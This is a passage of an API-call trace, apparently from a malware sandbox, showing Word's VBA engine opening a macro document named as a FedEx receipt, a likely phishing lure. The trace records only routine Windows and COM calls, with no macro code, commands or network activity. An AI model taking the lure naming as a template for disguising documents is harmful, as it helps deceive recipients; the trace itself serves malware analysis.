lpBaseAddress=0x6cacff4, dwSize=0x4b) returned 1 [0218.504] RtlLookupFunctionEntry (in: ControlPc=0x6cacff4, ImageBase=0x1896f8, HistoryTable=0x189700 | out: ImageBase=0x1896f8, HistoryTable=0x189700) returned 0x6cad04c [0218.504] SetErrorMode (uMode=0x8001) returned 0x8001 [0218.504] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0218.504] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x7fee4230000 [0218.505] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10016e9a00000360) returned 1 [0218.505] SetErrorMode (uMode=0x8001) returned 0x8001 [0218.505] GetProcAddress (hModule=0x7fee4230000, lpProcName=0x26b) returned 0x7fee439d5a8 [0218.505] GetCurrentProcess () returned 0xffffffffffffffff [0218.505] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cad0c4, dwSize=0x4b) returned 1 [0218.505] RtlLookupFunctionEntry (in: ControlPc=0x6cad0c4, ImageBase=0x1896f8, HistoryTable=0x189700 | out: ImageBase=0x1896f8, HistoryTable=0x189700) returned 0x6cad11c [0218.505] SetErrorMode (uMode=0x8001) returned 0x8001 [0218.505] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0218.505] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x7fee4230000 [0218.506] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10016e9a00000361) returned 1 [0218.506] SetErrorMode (uMode=0x8001) returned 0x8001 [0218.506] GetProcAddress (hModule=0x7fee4230000, lpProcName=0x258) returned 0x7fee4334ee0 [0218.506] GetCurrentProcess () returned 0xffffffffffffffff [0218.506] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cad244, dwSize=0x43) returned 1 [0218.506] RtlLookupFunctionEntry (in: ControlPc=0x6cad244, ImageBase=0x1896f8, HistoryTable=0x189700 | out: ImageBase=0x1896f8, HistoryTable=0x189700) returned 0x6cad294 [0218.506] GetCurrentThreadId () returned 0x8c0 [0218.506] GetCurrentThreadId () returned 0x8c0 [0218.507] GetCurrentThreadId () returned 0x8c0 [0218.507] GetCurrentThreadId () returned 0x8c0 [0218.507] GetSysColor (nIndex=18) returned 0x0 [0218.507] SetTextColor (hdc=0x70109a2, color=0x0) returned 0x0 [0218.507] GetSysColor (nIndex=15) returned 0xf0f0f0 [0218.507] SetBkColor (hdc=0x70109a2, color=0xf0f0f0) returned 0xffffff [0218.507] lstrlenA (lpString="") returned 0 [0218.507] GetTextExtentPoint32A (in: hdc=0x70109a2, lpString="", c=0, psizl=0x189df0 | out: psizl=0x189df0) returned 1 [0218.508] MulDiv (nNumber=17, nNumerator=1, nDenominator=2) returned 9 [0218.508] lstrlenA (lpString="") returned 0 [0218.508] ExtTextOutA (hdc=0x70109a2, x=475, y=14, options=0x0, lprect=0x189e00, lpString="", c=0x0, lpDx=0x0) returned 1 [0218.511] SysStringByteLen (bstr="潎浲污") returned 0x6 [0218.511] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d497a8, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0218.511] SysStringByteLen (bstr="潎浲污") returned 0x6 [0218.511] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d497a8, cbMultiByte=7, lpWideCharStr=0x6bc4228, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0218.511] strcpy_s (in: _Dst=0x189cc0, _DstSize=0x410, _Src="Microsoft Visual Basic for Applications" | out: _Dst="Microsoft Visual Basic for Applications") returned 0x0 [0218.511] strcat_s (in: _Destination="Microsoft Visual Basic for Applications", _SizeInBytes=0x410, _Source=" - " | out: _Destination="Microsoft Visual Basic for Applications - ") returned 0x0 [0218.511] strcat_s (in: _Destination="Microsoft Visual Basic for Applications - ", _SizeInBytes=0x410, _Source="Normal" | out: _Destination="Microsoft Visual Basic for Applications - Normal") returned 0x0 [0218.511] SetWindowTextA (hWnd=0x10202, lpString="Microsoft Visual Basic for Applications - Normal") returned 1 [0218.511] SendMessageA (hWnd=0x1020a, Msg=0x1102, wParam=0x1, lParam=0x6a68e80) returned 0x0 [0218.512] GetLastError () returned 0x0 [0218.512] IMalloc:Free (This=0x7feffc15380, pv=0x6c141b0) [0218.512] IMalloc:Free (This=0x7feffc15380, pv=0x6879030) [0218.515] GetCurrentThreadId () returned 0x8c0 [0218.515] SetCursor (hCursor=0x10007) returned 0x10003 [0218.516] GetCurrentThreadId () returned 0x8c0 [0218.516] CExposedDocFile::Release () returned 0x1 [0218.516] CExposedDocFile::Release () returned 0x0 [0218.516] CExposedDocFile::Release () returned 0x0 [0218.516] SendMessageA (hWnd=0x1020a, Msg=0x110a, wParam=0x3, lParam=0x6a68ee0) returned 0x6a67800 [0218.516] SendMessageA (hWnd=0x1020a, Msg=0x110c, wParam=0x0, lParam=0x18a1d0) returned 0x1 [0218.516] SendMessageA (hWnd=0x1020a, Msg=0x110a, wParam=0x4, lParam=0x6a67800) returned 0x0 [0218.517] SendMessageA (hWnd=0x1020a, Msg=0x1101, wParam=0x0, lParam=0x6a67800) returned 0x1 [0218.517] SendMessageA (hWnd=0x1020a, Msg=0x1101, wParam=0x0, lParam=0x6a68fa0) returned 0x1 [0218.518] SendMessageA (hWnd=0x1020a, Msg=0x110c, wParam=0x0, lParam=0x18a1d0) returned 0x1 [0218.518] SendMessageA (hWnd=0x1020a, Msg=0x110a, wParam=0x4, lParam=0x6a68f40) returned 0x0 [0218.518] SendMessageA (hWnd=0x1020a, Msg=0x1101, wParam=0x0, lParam=0x6a68f40) returned 0x1 [0218.518] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Forms.Form") returned 0x101727 [0218.518] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Forms.Form") returned 0x101727 [0218.518] lstrlenA (lpString="Thunder") returned 7 [0218.518] lstrcpyA (in: lpString1=0x18a150, lpString2="Thunder" | out: lpString1="Thunder") returned="Thunder" [0218.518] GetCurrentThreadId () returned 0x8c0 [0218.518] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="UserForm1") returned 0x10d629 [0218.519] GetCurrentThreadId () returned 0x8c0 [0218.519] GetCurrentThreadId () returned 0x8c0 [0218.519] SendMessageA (hWnd=0x1020a, Msg=0x1101, wParam=0x0, lParam=0x6a69060) returned 0x1 [0218.519] SendMessageA (hWnd=0x1020a, Msg=0x110c, wParam=0x0, lParam=0x18a1d0) returned 0x1 [0218.519] SendMessageA (hWnd=0x1020a, Msg=0x110a, wParam=0x4, lParam=0x6a69000) returned 0x0 [0218.519] SendMessageA (hWnd=0x1020a, Msg=0x1101, wParam=0x0, lParam=0x6a69000) returned 0x1 [0218.519] SendMessageA (hWnd=0x1020a, Msg=0x110c, wParam=0x0, lParam=0x18a230) returned 0x1 [0218.519] SendMessageA (hWnd=0x1020a, Msg=0x110a, wParam=0x4, lParam=0x6a691e0) returned 0x6a69240 [0218.519] SendMessageA (hWnd=0x1020a, Msg=0x110c, wParam=0x0, lParam=0x18a230) returned 0x1 [0218.519] SendMessageA (hWnd=0x1020a, Msg=0x1101, wParam=0x0, lParam=0x6a69240) returned 0x1 [0218.520] SendMessageA (hWnd=0x1020a, Msg=0x1101, wParam=0x0, lParam=0x6a691e0) returned 0x1 [0218.520] SendMessageA (hWnd=0x1020a, Msg=0x110a, wParam=0x4, lParam=0x6a68e80) returned 0x0 [0218.520] SendMessageA (hWnd=0x1020a, Msg=0x1101, wParam=0x0, lParam=0x6a68e80) returned 0x1 [0218.521] SendMessageA (hWnd=0x1020a, Msg=0x1105, wParam=0x0, lParam=0x0) returned 0x3 [0218.521] IUnknown:Release (This=0x6bb4768) returned 0x0 [0218.521] IUnknown:Release (This=0x6ceee08) returned 0x3 [0218.522] IMalloc:Free (This=0x7feffc15380, pv=0x6d26c10) [0218.522] IMalloc:Free (This=0x7feffc15380, pv=0x68803b0) [0218.522] IMalloc:Free (This=0x7feffc15380, pv=0x68804b0) [0218.522] IMalloc:Free (This=0x7feffc15380, pv=0x6880470) [0218.522] IMalloc:Free (This=0x7feffc15380, pv=0x68806b0) [0218.522] IMalloc:Free (This=0x7feffc15380, pv=0x6880670) [0218.522] IMalloc:Free (This=0x7feffc15380, pv=0x6880630) [0218.522] IMalloc:Free (This=0x7feffc15380, pv=0x6b85270) [0218.522] IMalloc:Free (This=0x7feffc15380, pv=0x6879630) [0218.522] IMalloc:Free (This=0x7feffc15380, pv=0x68894b0) [0218.522] IMalloc:Free (This=0x7feffc15380, pv=0x6b85220) [0218.522] IMalloc:Free (This=0x7feffc15380, pv=0x6889370) [0218.522] IMalloc:Free (This=0x7feffc15380, pv=0x688c8f0) [0218.522] IMalloc:Free (This=0x7feffc15380, pv=0x6889770) [0218.522] IMalloc:Free (This=0x7feffc15380, pv=0x6cb92a0) [0218.522] RtlLookupFunctionEntry (in: ControlPc=0x6cabc6c, ImageBase=0x189f50, HistoryTable=0x189f70 | out: ImageBase=0x189f50, HistoryTable=0x189f70) returned 0x0 [0218.522] RtlLookupFunctionEntry (in: ControlPc=0x6cac46c, ImageBase=0x189f50, HistoryTable=0x189f70 | out: ImageBase=0x189f50, HistoryTable=0x189f70) returned 0x0 [0218.522] RtlLookupFunctionEntry (in: ControlPc=0x6cac54c, ImageBase=0x189f50, HistoryTable=0x189f70 | out: ImageBase=0x189f50, HistoryTable=0x189f70) returned 0x0 [0218.522] RtlLookupFunctionEntry (in: ControlPc=0x6cac5d4, ImageBase=0x189f50, HistoryTable=0x189f70 | out: ImageBase=0x189f50, HistoryTable=0x189f70) returned 0x0 [0218.522] RtlLookupFunctionEntry (in: ControlPc=0x6cac714, ImageBase=0x189f50, HistoryTable=0x189f70 | out: ImageBase=0x189f50, HistoryTable=0x189f70) returned 0x0 [0218.522] RtlLookupFunctionEntry (in: ControlPc=0x6cac79c, ImageBase=0x189f50, HistoryTable=0x189f70 | out: ImageBase=0x189f50, HistoryTable=0x189f70) returned 0x0 [0218.522] RtlLookupFunctionEntry (in: ControlPc=0x6cac90c, ImageBase=0x189f50, HistoryTable=0x189f70 | out: ImageBase=0x189f50, HistoryTable=0x189f70) returned 0x0 [0218.522] RtlLookupFunctionEntry (in: ControlPc=0x6cac994, ImageBase=0x189f50, HistoryTable=0x189f70 | out: ImageBase=0x189f50, HistoryTable=0x189f70) returned 0x0 [0218.522] RtlLookupFunctionEntry (in: ControlPc=0x6caca74, ImageBase=0x189f50, HistoryTable=0x189f70 | out: ImageBase=0x189f50, HistoryTable=0x189f70) returned 0x0 [0218.522] RtlLookupFunctionEntry (in: ControlPc=0x6cacb5c, ImageBase=0x189f50, HistoryTable=0x189f70 | out: ImageBase=0x189f50, HistoryTable=0x189f70) returned 0x0 [0218.522] RtlLookupFunctionEntry (in: ControlPc=0x6cacc3c, ImageBase=0x189f50, HistoryTable=0x189f70 | out: ImageBase=0x189f50, HistoryTable=0x189f70) returned 0x0 [0218.522] RtlLookupFunctionEntry (in: ControlPc=0x6caccc4, ImageBase=0x189f50, HistoryTable=0x189f70 | out: ImageBase=0x189f50, HistoryTable=0x189f70) returned 0x0 [0218.522] IMalloc:Free (This=0x7feffc15380, pv=0x6b9cf10) [0218.522] IMalloc:Free (This=0x7feffc15380, pv=0x6d08c00) [0218.522] RtlLookupFunctionEntry (in: ControlPc=0x6a7bfb4, ImageBase=0x189f50, HistoryTable=0x189f70 | out: ImageBase=0x189f50, HistoryTable=0x189f70) returned 0x0 [0218.522] RtlLookupFunctionEntry (in: ControlPc=0x6caaf9c, ImageBase=0x189f50, HistoryTable=0x189f70 | out: ImageBase=0x189f50, HistoryTable=0x189f70) returned 0x0 [0218.522] RtlLookupFunctionEntry (in: ControlPc=0x6cab064, ImageBase=0x189f50, HistoryTable=0x189f70 | out: ImageBase=0x189f50, HistoryTable=0x189f70) returned 0x0 [0218.523] RtlLookupFunctionEntry (in: ControlPc=0x6cab1ec, ImageBase=0x189f50, HistoryTable=0x189f70 | out: ImageBase=0x189f50, HistoryTable=0x189f70) returned 0x0 [0218.523] RtlLookupFunctionEntry (in: ControlPc=0x6cab2bc, ImageBase=0x189f50, HistoryTable=0x189f70 | out: ImageBase=0x189f50, HistoryTable=0x189f70) returned 0x0 [0218.523] RtlLookupFunctionEntry (in: ControlPc=0x6a7c084, ImageBase=0x189f50, HistoryTable=0x189f70 | out: ImageBase=0x189f50, HistoryTable=0x189f70) returned 0x0 [0218.523] RtlLookupFunctionEntry (in: ControlPc=0x6cab43c, ImageBase=0x189f50, HistoryTable=0x189f70 | out: ImageBase=0x189f50, HistoryTable=0x189f70) returned 0x0 [0218.523] RtlLookupFunctionEntry (in: ControlPc=0x6cab4f4, ImageBase=0x189f50, HistoryTable=0x189f70 | out: ImageBase=0x189f50, HistoryTable=0x189f70) returned 0x0 [0218.523] RtlLookupFunctionEntry (in: ControlPc=0x6cab8dc, ImageBase=0x189f50, HistoryTable=0x189f70 | out: ImageBase=0x189f50, HistoryTable=0x189f70) returned 0x0 [0218.523] IMalloc:Free (This=0x7feffc15380, pv=0x6d33ef0) [0218.523] IMalloc:Free (This=0x7feffc15380, pv=0x6cb8a60) [0218.523] RtlLookupFunctionEntry (in: ControlPc=0x6ca680c, ImageBase=0x189f50, HistoryTable=0x189f70 | out: ImageBase=0x189f50, HistoryTable=0x189f70) returned 0x0 [0218.523] IMalloc:Free (This=0x7feffc15380, pv=0x6b9fb80) [0218.523] IMalloc:Free (This=0x7feffc15380, pv=0x3e62b70) [0218.523] IMalloc:Free (This=0x7feffc15380, pv=0x3e64550) [0218.523] RtlLookupFunctionEntry (in: ControlPc=0x6cad244, ImageBase=0x189f50, HistoryTable=0x189f70 | out: ImageBase=0x189f50, HistoryTable=0x189f70) returned 0x6cad294 [0218.523] RtlLookupFunctionEntry (in: ControlPc=0x6cad0c4, ImageBase=0x189f50, HistoryTable=0x189f70 | out: ImageBase=0x189f50, HistoryTable=0x189f70) returned 0x6cad11c [0218.523] RtlLookupFunctionEntry (in: ControlPc=0x6cacff4, ImageBase=0x189f50, HistoryTable=0x189f70 | out: ImageBase=0x189f50, HistoryTable=0x189f70) returned 0x6cad04c [0218.523] IMalloc:Free (This=0x7feffc15380, pv=0x3e67070) [0218.523] IMalloc:Free (This=0x7feffc15380, pv=0x3e667d0) [0218.523] IMalloc:Free (This=0x7feffc15380, pv=0x3e64df0) [0218.523] IMalloc:Free (This=0x7feffc15380, pv=0x3e649a0) [0218.523] IMalloc:Free (This=0x7feffc15380, pv=0x3e66380) [0218.523] IMalloc:Free (This=0x7feffc15380, pv=0x3e65240) [0218.523] RtlLookupFunctionEntry (in: ControlPc=0x6cacdac, ImageBase=0x189f90, HistoryTable=0x189fb0 | out: ImageBase=0x189f90, HistoryTable=0x189fb0) returned 0x6cace08 [0218.523] RtlLookupFunctionEntry (in: ControlPc=0x6cace64, ImageBase=0x189f90, HistoryTable=0x189fb0 | out: ImageBase=0x189f90, HistoryTable=0x189fb0) returned 0x6cacec0 [0218.523] IMalloc:Free (This=0x7feffc15380, pv=0x3e66c20) [0218.523] IMalloc:Free (This=0x7feffc15380, pv=0x6bc0600) [0218.524] IMalloc:Realloc (This=0x7feffc15380, pv=0x6b87340, cb=0x0) returned 0x0 [0218.524] IMalloc:Alloc (This=0x7feffc15380, cb=0x0) returned 0x6c141b0 [0218.524] IMalloc:Free (This=0x7feffc15380, pv=0x6c13fa0) [0218.524] IMalloc:Free (This=0x7feffc15380, pv=0x68ea0f0) [0218.524] IMalloc:Free (This=0x7feffc15380, pv=0x6ccfa90) [0218.524] IUnknown:Release (This=0x6a861c0) returned 0x3 [0218.524] IMalloc:Free (This=0x7feffc15380, pv=0x6c6a1f0) [0218.524] IMalloc:Free (This=0x7feffc15380, pv=0x69d64b0) [0218.524] IMalloc:Free (This=0x7feffc15380, pv=0x6c32830) [0218.525] IMalloc:Free (This=0x7feffc15380, pv=0x68ea180) [0218.525] IMalloc:Free (This=0x7feffc15380, pv=0x6c31f10) [0218.525] IMalloc:Free (This=0x7feffc15380, pv=0x6b9f040) [0218.525] IMalloc:Free (This=0x7feffc15380, pv=0x6c141b0) [0218.525] IMalloc:Free (This=0x7feffc15380, pv=0x6b0a370) [0218.525] IMalloc:Free (This=0x7feffc15380, pv=0x6c6f800) [0218.525] IMalloc:Free (This=0x7feffc15380, pv=0x6b0d520) [0218.525] IMalloc:Free (This=0x7feffc15380, pv=0x6b0d6a0) [0218.525] IMalloc:Free (This=0x7feffc15380, pv=0x6b9ee90) [0218.525] IMalloc:Free (This=0x7feffc15380, pv=0x6ca4500) [0218.525] IMalloc:Free (This=0x7feffc15380, pv=0x6ad5eb0) [0218.525] IMalloc:Free (This=0x7feffc15380, pv=0x6c8a8c0) [0218.525] VirtualFree (lpAddress=0x5e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0218.525] IMalloc:Free (This=0x7feffc15380, pv=0x6880f70) [0218.525] IMalloc:Free (This=0x7feffc15380, pv=0x68e9f10) [0218.525] IMalloc:Free (This=0x7feffc15380, pv=0x66ebcc0) [0218.525] IUnknown:Release (This=0x6a6e948) returned 0x2 [0218.525] IUnknown:Release (This=0x6ccf078) returned 0x1 [0218.526] IUnknown:Release (This=0x6a6e9a8) returned 0x0 [0218.526] IUnknown:Release (This=0x6a6e8e8) returned 0x1 [0218.526] IUnknown:Release (This=0x6ceee08) returned 0x2 [0218.526] IUnknown:Release (This=0x6ceeeb8) returned 0x1 [0218.526] IMalloc:Realloc (This=0x7feffc15380, pv=0x6ba0000, cb=0x0) returned 0x0 [0218.526] IMalloc:Alloc (This=0x7feffc15380, cb=0x0) returned 0x6b0a370 [0218.526] IMalloc:Free (This=0x7feffc15380, pv=0x6c13f90) [0218.526] IMalloc:Free (This=0x7feffc15380, pv=0x68e9eb0) [0218.526] IMalloc:Free (This=0x7feffc15380, pv=0x6c29d20) [0218.526] IUnknown:Release (This=0x6ccf078) returned 0x0 [0218.528] IUnknown:Release (This=0x6ceefc0) returned 0x5 [0218.528] IUnknown:Release (This=0x6cef120) returned 0x0 [0218.528] IUnknown:Release (This=0x6ceefc0) returned 0x4 [0218.528] IUnknown:Release (This=0x6ceefc0) returned 0x3 [0218.528] IUnknown:Release (This=0x6ceefc0) returned 0x2 [0218.528] IUnknown:Release (This=0x6ceefc0) returned 0x1 [0218.528] IUnknown:Release (This=0x6cef280) returned 0x1 [0218.528] IUnknown:Release (This=0x6cef280) returned 0x0 [0218.529] IUnknown:Release (This=0x6ceefc0) returned 0x0 [0218.529] IMalloc:Free (This=0x7feffc15380, pv=0x6d19220) [0218.529] IMalloc:Free (This=0x7feffc15380, pv=0x69d6b00) [0218.529] IMalloc:Free (This=0x7feffc15380, pv=0x6c34690) [0218.529] IMalloc:Free (This=0x7feffc15380, pv=0x68e9f40) [0218.529] IMalloc:Free (This=0x7feffc15380, pv=0x6c322b0) [0218.529] IMalloc:Free (This=0x7feffc15380, pv=0x6b9efb0) [0218.529] IMalloc:Free (This=0x7feffc15380, pv=0x6b0a370) [0218.529] IMalloc:Free (This=0x7feffc15380, pv=0x6b0a470) [0218.529] IMalloc:Free (This=0x7feffc15380, pv=0x6c6fbe0) [0218.529] IConnectionPoint:Unadvise (This=0x6ccf010, dwCookie=0x4) returned 0x0 [0218.530] IMalloc:Free (This=0x7feffc15380, pv=0x6bc3800) [0218.530] IUnknown:Release (This=0x6ccf010) returned 0x1 [0218.531] IConnectionPoint:Unadvise (This=0x6ccefb0, dwCookie=0x4) returned 0x0 [0218.531] IMalloc:Free (This=0x7feffc15380, pv=0x6bc3380) [0218.531] IUnknown:Release (This=0x6ccefb0) returned 0x1 [0218.531] IMalloc:Free (This=0x7feffc15380, pv=0x6b0d460) [0218.531] IMalloc:Free (This=0x7feffc15380, pv=0x6b0d5e0) [0218.531] IMalloc:Free (This=0x7feffc15380, pv=0x6b9f1f0) [0218.531] IMalloc:Free (This=0x7feffc15380, pv=0x6ca4d00) [0218.531] IMalloc:Free (This=0x7feffc15380, pv=0x66ea490) [0218.531] IMalloc:Free (This=0x7feffc15380, pv=0x6c8af50) [0218.531] VirtualFree (lpAddress=0x5e60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0218.531] IMalloc:Free (This=0x7feffc15380, pv=0x68805f0) [0218.531] IMalloc:Free (This=0x7feffc15380, pv=0x68e9d90) [0218.532] IMalloc:Free (This=0x7feffc15380, pv=0x6678120) [0218.532] IUnknown:Release (This=0x6a6e8e8) returned 0x0 [0218.532] IUnknown:Release (This=0x6ceee08) returned 0x0 [0218.532] IUnknown:Release (This=0x6ceeeb8) returned 0x0 [0218.534] IUnknown:Release (This=0x6bb49d0) returned 0x0 [0218.534] IUnknown:Release (This=0x6bb4b88) returned 0x0 [0218.534] IMalloc:Realloc (This=0x7feffc15380, pv=0x6b88100, cb=0x0) returned 0x0 [0218.534] IMalloc:Alloc (This=0x7feffc15380, cb=0x0) returned 0x6cbdf70 [0218.534] IMalloc:Free (This=0x7feffc15380, pv=0x6c13fc0) [0218.534] IMalloc:Free (This=0x7feffc15380, pv=0x68e9d00) [0218.534] IMalloc:Free (This=0x7feffc15380, pv=0x6ccfe50) [0218.534] IMalloc:Free (This=0x7feffc15380, pv=0x69d7150) [0218.534] IMalloc:Free (This=0x7feffc15380, pv=0x68e9fd0) [0218.534] IMalloc:Free (This=0x7feffc15380, pv=0x6b27dc0) [0218.534] IMalloc:Free (This=0x7feffc15380, pv=0x6b9f310) [0218.534] IMalloc:Free (This=0x7feffc15380, pv=0x6cbdf70) [0218.534] IMalloc:Free (This=0x7feffc15380, pv=0x6b0a3a0) [0218.534] IMalloc:Free (This=0x7feffc15380, pv=0x6ca4920) [0218.534] IMalloc:Free (This=0x7feffc15380, pv=0x6b0d760) [0218.534] IMalloc:Free (This=0x7feffc15380, pv=0x6b0d820) [0218.534] IMalloc:Free (This=0x7feffc15380, pv=0x6b9f280) [0218.534] IMalloc:Free (This=0x7feffc15380, pv=0x6c323b0) [0218.534] wcsncpy_s (in: _Destination=0x189e60, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc") returned 0x0 [0218.534] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc", cchLength=0x36 | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\receipt_fedex_4028873.doc") returned 0x36 [0218.534] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\receipt_fedex_4028873.doc", cchWideChar=55, lpMultiByteStr=0x189d90, cbMultiByte=110, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\receipt_fedex_4028873.doc", lpUsedDefaultChar=0x0) returned 55 [0218.534] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc", _String2="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned -4 [0218.535] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc", _String2="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc") returned 0 [0218.537] IMalloc:Realloc (This=0x7feffc15380, pv=0x68ea030, cb=0x0) returned 0x0 [0218.537] IMalloc:Alloc (This=0x7feffc15380, cb=0x0) returned 0x6c13f80 [0218.537] IMalloc:Free (This=0x7feffc15380, pv=0x6cbe540) [0218.537] IMalloc:Free (This=0x7feffc15380, pv=0x68e9e20) [0218.537] IMalloc:Free (This=0x7feffc15380, pv=0x68ea060) [0218.537] IMalloc:Free (This=0x7feffc15380, pv=0x6cc2380) [0218.537] IMalloc:Free (This=0x7feffc15380, pv=0x68e9880) [0218.537] IMalloc:Free (This=0x7feffc15380, pv=0x6c327b0) [0218.537] IMalloc:Free (This=0x7feffc15380, pv=0x6b9f160) [0218.537] IMalloc:Free (This=0x7feffc15380, pv=0x6c13f80) [0218.537] IMalloc:Free (This=0x7feffc15380, pv=0x6c13fe0) [0218.537] IMalloc:Free (This=0x7feffc15380, pv=0x6bd3150) [0218.537] IMalloc:Free (This=0x7feffc15380, pv=0x6b0db20) [0218.537] IMalloc:Free (This=0x7feffc15380, pv=0x6b24d60) [0218.537] IMalloc:Free (This=0x7feffc15380, pv=0x6b24e40) [0218.539] IMalloc:Free (This=0x7feffc15380, pv=0x6c6a110) [0218.539] IMalloc:Free (This=0x7feffc15380, pv=0x6c141a0) [0218.539] IMalloc:Free (This=0x7feffc15380, pv=0x6889530) [0218.539] IMalloc:Free (This=0x7feffc15380, pv=0x6c29c70) [0218.539] IMalloc:Free (This=0x7feffc15380, pv=0x6c29bc0) [0218.719] ShowWindow (hWnd=0x1021c, nCmdShow=0) returned 0 [0218.719] ShowWindow (hWnd=0x1021a, nCmdShow=0) returned 0 [0218.719] SendMessageA (hWnd=0x10212, Msg=0x14b, wParam=0x0, lParam=0x0) returned 0x1 [0218.719] SendMessageA (hWnd=0x10218, Msg=0x184, wParam=0x0, lParam=0x0) returned 0x0 [0218.719] SetWindowTextA (hWnd=0x1021c, lpString="") returned 1 [0218.720] SetWindowTextA (hWnd=0x1020e, lpString="Properties") returned 1 [0218.720] GetWindowRect (in: hWnd=0x10216, lpRect=0x18a1d0 | out: lpRect=0x18a1d0) returned 1 [0218.720] MapWindowPoints (in: hWndFrom=0x0, hWndTo=0x1020e, lpPoints=0x18a1d0, cPoints=0x2 | out: lpPoints=0x18a1d0) returned -3080200 [0218.720] GetDC (hWnd=0x1020e) returned 0x3010987 [0218.720] InflateRect (in: lprc=0x18a1c0, dx=-1, dy=-1 | out: lprc=0x18a1c0) returned 1 [0218.720] GetSysColor (nIndex=15) returned 0xf0f0f0 [0218.720] SetBkColor (hdc=0x3010987, color=0xf0f0f0) returned 0xffffff [0218.720] ExtTextOutA (hdc=0x3010987, x=2, y=58, options=0x6, lprect=0x18a1c0, lpString="", c=0x0, lpDx=0x0) returned 1 [0218.720] ReleaseDC (hWnd=0x1020e, hDC=0x3010987) returned 1 [0218.722] SysStringByteLen (bstr="潎浲污") returned 0x6 [0218.722] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d497a8, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0218.722] SysStringByteLen (bstr="潎浲污") returned 0x6 [0218.723] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d497a8, cbMultiByte=7, lpWideCharStr=0x6bc4228, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0218.730] IsWindowVisible (hWnd=0x10202) returned 0 [0218.736] CoDisconnectObject (pUnk=0x4de29c8, dwReserved=0x0) returned 0x0 [0218.781] SendMessageA (hWnd=0x1020a, Msg=0x1102, wParam=0x1, lParam=0x6a690c0) returned 0x0 [0218.781] GetLastError () returned 0x0 [0218.781] IMalloc:Free (This=0x7feffc15380, pv=0x6c10880) [0218.781] IUnknown:Release (This=0x6990960) returned 0x3 [0218.781] IUnknown:Release (This=0x6992850) returned 0xa [0218.782] IUnknown:Release (This=0x6992df0) returned 0x4 [0218.782] IUnknown:Release (This=0x6992580) returned 0x2 [0218.782] GetSysColor (nIndex=18) returned 0x0 [0218.782] SetTextColor (hdc=0x3010987, color=0x0) returned 0x0 [0218.782] GetSysColor (nIndex=15) returned 0xf0f0f0 [0218.782] SetBkColor (hdc=0x3010987, color=0xf0f0f0) returned 0xffffff [0218.782] lstrlenA (lpString="") returned 0 [0218.782] GetTextExtentPoint32A (in: hdc=0x3010987, lpString="", c=0, psizl=0x18c5a0 | out: psizl=0x18c5a0) returned 1 [0218.782] MulDiv (nNumber=17, nNumerator=1, nDenominator=2) returned 9 [0218.782] lstrlenA (lpString="") returned 0 [0218.782] ExtTextOutA (hdc=0x3010987, x=475, y=14, options=0x0, lprect=0x18c5b0, lpString="", c=0x0, lpDx=0x0) returned 1 [0218.785] SysStringByteLen (bstr="潎浲污") returned 0x6 [0218.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d497a8, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0218.786] SysStringByteLen (bstr="潎浲污") returned 0x6 [0218.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d497a8, cbMultiByte=7, lpWideCharStr=0x6bc4228, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0218.786] strcpy_s (in: _Dst=0x18c470, _DstSize=0x410, _Src="Microsoft Visual Basic for Applications" | out: _Dst="Microsoft Visual Basic for Applications") returned 0x0 [0218.786] strcat_s (in: _Destination="Microsoft Visual Basic for Applications", _SizeInBytes=0x410, _Source=" - " | out: _Destination="Microsoft Visual Basic for Applications - ") returned 0x0 [0218.786] strcat_s (in: _Destination="Microsoft Visual Basic for Applications - ", _SizeInBytes=0x410, _Source="Normal" | out: _Destination="Microsoft Visual Basic for Applications - Normal") returned 0x0 [0218.786] SetWindowTextA (hWnd=0x10202, lpString="Microsoft Visual Basic for Applications - Normal") returned 1 [0218.786] SendMessageA (hWnd=0x1020a, Msg=0x1102, wParam=0x1, lParam=0x6a690c0) returned 0x0 